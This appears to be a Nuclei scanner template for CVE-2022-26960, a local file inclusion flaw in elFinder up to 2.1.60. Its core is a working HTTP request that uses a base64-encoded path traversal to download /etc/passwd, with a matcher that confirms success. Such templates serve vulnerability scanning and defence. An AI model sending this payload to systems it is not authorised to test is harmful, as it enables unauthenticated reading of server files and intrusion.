id: CVE-2022-26960 info: name: elFinder <=2.1.60 - Local File Inclusion author: pikpikcu severity: critical description: | elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. reference: - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db - https://www.synacktiv.com/publications.html - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2022-26960 cwe-id: CWE-22 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* epss-score: 0.93908 metadata: max-request: 1 verified: true tags: cve,cve2022,lfi,elfinder http: - raw: - | GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/07/05